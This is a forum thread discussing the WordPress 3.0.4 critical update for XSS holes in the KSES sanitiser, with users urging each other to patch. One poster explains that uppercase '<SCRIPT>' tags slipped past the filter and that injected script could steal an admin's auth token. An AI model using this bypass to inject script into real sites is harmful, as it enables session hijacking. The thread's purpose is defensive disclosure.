Wordpress 3.0.4 XSS critical update

[cd34]

http://wordpress.org/news/2010/12/3-0-4-update/

Quote:

Version 3.0.4 of WordPress, available immediately through the update page in your dashboard or for download here, is a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

I realize an update during the holidays is no fun, but this one is worth putting down the eggnog for. In the spirit of the holidays, consider helping your friends as well.

If you are a security researcher, we’d appreciate you taking a look over this changeset as well to review our update. We’ve given it a lot of thought and review but since this is so core we want as many brains on it as possible. Thanks to Mauro Gentile and Jon Cave (duck_) who discovered and alerted us to these XSS vulnerabilities first.

[Bill]

Do you have a sense of what the vulnerability is? Have you seen or heard of anything exploited yet?

[cd34]

I haven't pulled down 3.0.3 and 3.0.4 yet to see what they changed. I've never understood why anyone tries to clean up data... if it doesn't match your validation, it should be declined.

I suspect the error might be in the commenting or post section as that is the only place that library seems to be called - so, if your blog doesn't have comments, it may not be vulnerable. However, it could be in the user's bio field, and an admin that views a users profile could leak the admin cookie. I'll take a look later, just seemed prudent to let people know earlier rather than later.

[ponyman]

Good info. Thanks for the heads up! Updating my WP sites now...

[cd34]

changeset

http://core.trac.wordpress.org/chang...2/branches/3.0

basically, anywhere someone can enter input that might contain html.. comments, bio, posts, etc. can be exploited.

[Bill]

Damn, you gotta be some sort of frikking genius or savant to understand that page.

But sounds fucked up.

What happens if you have comments set to approve only? Does the exploit still get you?

[Ms Naughty]

Would this exploit apply to older versions of WP?

[cd34]

I believe based on what they changed, that almost every version of wordpress is vulnerable. KSES was their 'end-all be-all' solution to html sanitization, and, it has a pretty big hole. Any place you can enter text, that could potentially include html, would be possible to exploit.

While <script> was filtered out correctly, it appears that <SCRIPT> was not.

If the comment is set to approve only, it is possible that a script could be written that could expose your auth information - not the password, but the auth token. A savvy enough person could use that to get into wordpress. Alternatively they could do an iframe exploit that could expose you to malicious content just by viewing the content.

I'm not entirely sure where they use KSES for sanitization, but, it looks like almost every input calls it.

Not really a thrilling thought.

[bDok]

Blah. Fun fun fun in updating. I guess I know what I'll be doing later today.